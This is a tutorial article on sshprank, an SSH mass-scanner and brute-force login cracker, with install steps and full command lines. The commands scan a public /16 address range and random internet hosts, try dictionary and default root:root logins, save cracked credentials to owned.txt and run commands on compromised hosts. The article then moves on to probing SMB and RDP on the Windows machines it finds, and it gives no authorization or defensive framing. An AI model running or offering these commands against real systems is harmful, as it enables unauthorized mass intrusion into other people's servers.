sshprank: SSH mass-scanner, login cracker and banner grabber

This article is about the sshprank tool, which is a fast network scanner looking for SSH servers. The program searches for computers running SSH and tries to log in using the specified credentials, that is, it performs automated brute-force attack. Also, the program is able to very quickly grab banners of a large number of SSH.

SSH is the most important service for connecting and executing commands on remote Linux computers. But SSH is also heavily used on FreeBSD computers, and even sometimes on Windows.

How to install sshprank

Install sshprank on Kali Linux

sudo apt install python3-pip
git clone https://github.com/noptrix/sshprank
cd sshprank
sudo pip3 install -r docs/requirements.txt
./sshprank.py -H

Install sshprank on BlackArch

sudo pacman -S sshprank

How to install sshprank on Windows

Start by installing Python according to the article “How to install Python and PIP on Windows 10”.

After installing Python and PIP, download the sshprank source code archive: https://github.com/noptrix/sshprank/archive/master.zip

Unzip the archive.

Open a command prompt or PowerShell (if you don’t know how, then see the article “How to set up the PowerShell environment on Windows and Linux”).

Go to the folder of the unpacked archive using the cd command (you will have a different path to the folder, so edit the command accordingly):

cd C:\Users\MiAl\Downloads\sshprank-master\

Install the required dependencies:

pip install -r docs\requirements.txt

Perform a check (program usage should be displayed):

python .\sshprank.py -H

Further work with the program is the same as in Linux, but instead of sshprank you need to specify python .\sshprank.py, for example:

python .\sshprank.py -h 138.201.59.125 -v

How to create a host list

The sshprank program does not directly support ranges, although a little later I will show how you can still specify subnets for scanning using sshprank. Therefore, for sshprank you need to create a list of hosts.

So, I want to scan the range 138.201.0.0/16. To list hosts, I run the following command:

echo -e 138.201.{0..255}.{0..255}"\n" | sed 's/ //' > hosts.txt

Check that we generated:

head -n 20 hosts.txt

How to launch sshprank

In sshprank, hosts can be specified with the following options:

  -h <host:[ports]>     - single host to crack. multiple ports can be separated
                          by comma, e.g.: 22,2022,22222 (default port: 22)

  -l <file>             - list of hosts to crack. format: <host>[:ports]. multiple
                          ports can be separated by comma (default port: 22)

That is, if we want to specify a single host, then this can be done using the -h option:

./sshprank.py -h 138.201.59.125

You can also specify ports (otherwise, the default port 22 is used for SSH service):

./sshprank.py -h 138.201.59.125:22,2022,22222

By default, the program does not display any information, it does not even show hacked hosts, logins and passwords. To display this information, use the -v option:

./sshprank.py -h 138.201.59.125 -v

If the login and password are not specified, then “root” is used as the login, and “root” is used as the password.

How to specify login and password dictionaries in sshprank

To specify a username, password or dictionaries the following options are used:

  -u <user>             - single username (default: root)
  -U <file>             - list of usernames
  -p                    - single password (default: root)
  -P <file>             - list of passwords
  -C <file>             - list of user:pass combination

Tiny dictionaries are provided with the program:

  • lists/user.txt – usernames
  • lists/pws.txt – passwords
  • lists/combo.txt – user name and password combinations

But the dictionaries are very tiny, I would recommend using other, more suitable and bigger ones.

Run sshprank against the target host using the specified dictionaries for usernames and passwords:

sshprank -h 192.168.0.100 -U user.txt -P passwords.txt -v

sshprank results

If we had not used the -v option, then practically nothing would have been output. The -v option displays information about connection attempts, successfully cracked accounts, as well as the reasons for the failure, for example:

  • [!] could not connect: - because the SSH service is not running, or the host is offline.
  • [!] login failure: … (auth timeout) - the most likely reason is the wrong username or password.
  • [!] login failure: … (auth failed) — the server clearly reported a failed login (invalid username or password).
  • [!] login failure: … (pubkey auth) — failed to authenticate due to the fact that the login is performed using the public key.

Pay attention to the line with a green asterisk:

[*] found login: 192.168.0.100:22:mial:2

That is, the login (mial) and password (2) for the service on port 22 on the host 192.168.0.100 were found.

All successfully found logins and passwords are saved in the owned.txt file in the current working folder. The name and path to the file can be changed with the -o <FILE>. option.

How to scan a large number of SSH

We can specify a list of hosts using the following option:

  -l <file>             - list of hosts to crack. format: <host>[:ports]. multiple
                          ports can be seperated by comma (default port: 22)

Launch Example:

./sshprank.py -l hosts.txt -U lists/user.txt -P lists/pws.txt -v

It is not possible to figure out sshprank output if multiple hosts are scanned. To constantly avoid manually checking the owned.txt file, you can use the following commands:

touch owned.txt
tail -f owned.txt

The first command will create the file if it does not already exist. And the second command will immediately display all changes in this file, if they take place.

How to quickly grab SSH banners in a large network

To do this, use the -b option:

  -b <file>             - list of hosts to grab sshd banner from
                          format: <host>[:ports]. multiple ports can be
                          seperated by comma (default port: 22)

That is, with this option you can specify a list of hosts in the same format as the -l option. Only the operating mode will change – banners will be collected instead of brute-force.

The next command save results to the specified file:

./sshprank.py -b hosts.txt > ssh_banners.txt

You can monitor the contents of this file in the same way:

touch ssh_banners.txt
tail -f ssh_banners.txt

Banners can be used for various purposes. For example, you can find all Windows computers running the SSH service:

cat ssh_banners.txt | grep -i windows

On Windows servers, SMB and RDP service ports are often open, you can play with them.

To filter hosts running Windows:

cat ssh_banners.txt | grep -i windows | awk -F ':' '{ print $1 }' > windows_hosts.txt

Looking for SMB and NetBIOS running services:

sudo nmap -iL windows_hosts.txt -p 139,445 --open

Scan to open RDP ports:

sudo nmap -iL windows_hosts.txt -p 3389 -sU -sS --open

An example of obtaining information about RDP and the name of a Windows computer:

sudo nmap -p 3389 -sU -sS --script 'rdp-*' 138.201.134.34

To find computers running FreeBSD:

cat ssh_banners.txt | grep -i bsd

By banners, you can search for old versions of Linux distributions, specific versions of the SSH implementation that are known to be vulnerable, perform statistical analysis, and more.

Masscan options

sshprank uses the Masscan module, and also has the -m option which can be used to pass options to Masscan itself. A few examples:

First scan then crack from founds ssh services:

sudo ./sshprank -m '-p22,2022 --rate=5000 --source-ip 192.168.13.37 --range 192.168.13.1/24'

Generate 1k random ipv4 addresses, then port-scan (tcp/22 here) with 1k p/s and crack login 'root:root' on found sshds

sudo ./sshprank -m '-p22 --rate=1000' -r 1000 -v

You can specify not only these, but any Masscan options.

All sshprank options

modes

  -h <host:[ports]>     - single host to crack. multiple ports can be separated
                          by comma, e.g.: 22,2022,22222 (default port: 22)

  -l <file>             - list of hosts to crack. format: <host>[:ports]. multiple
                          ports can be separated by comma (default port: 22)

  -m <opts> [-r ]  - pass arbitrary masscan opts, portscan given hosts and
                          crack for logins. found sshd services will be saved to
                          'sshds.txt' in supported format for '-l' option and
                          even for '-b'. use '-r' for generating random ipv4
                          addresses rather than scanning given hosts. these
                          options are always on: '-sS -oX - --open'.
                          NOTE: if you intent to use the '--banner' option then
                          you need to specify '--source-ip <some_ipaddr>' which
                          is needed by masscan.

  -b <file>             - list of hosts to grab sshd banner from
                          format: <host>[:ports]. multiple ports can be
                          separated by comma (default port: 22)

options

  -r <num>              - generate <num> random ipv4 addresses, check for open
                          sshd port and crack for login (only with -m option!)
  -c <cmd>              - execute this <cmd> on host if login was cracked
  -u <user>             - single username (default: root)
  -U <file>             - list of usernames
  -p                    - single password (default: root)
  -P <file>             - list of passwords
  -C <file>             - list of user:pass combination
  -x <num>              - num threads for parallel host crack (default: 20)
  -s <num>              - num threads for parallel service crack (default: 10)
  -X <num>              - num threads for parallel login crack (default: 20)
  -B <num>              - num threads for parallel banner grabbing (default: 50)
  -T <sec>              - num sec for connect timeout (default: 2s)
  -R <sec>              - num sec for (banner) read timeout (default: 2s)
  -o <file>             - write found logins to file. format:
                          <host>:<port>:<user>:<pass> (default: owned.txt)
  -e                    - exit after first login was found. continue with other
                          hosts instead (default: off)
  -v                    - verbose mode. show found logins, sshds, etc.
                          (default: off)

misc

  -H                    - print help
  -V                    - print version information

Conclusion

sshprank comes in handy when your goal is SSH servers scattered across a large network or when you need to collect SSH banners over large network ranges very quickly. For example, from the /16 range (65536 IP addresses), you can collect SSH service banners in just a few minutes.

Last Updated on

Recommended for you:

Leave a Reply

Your email address will not be published.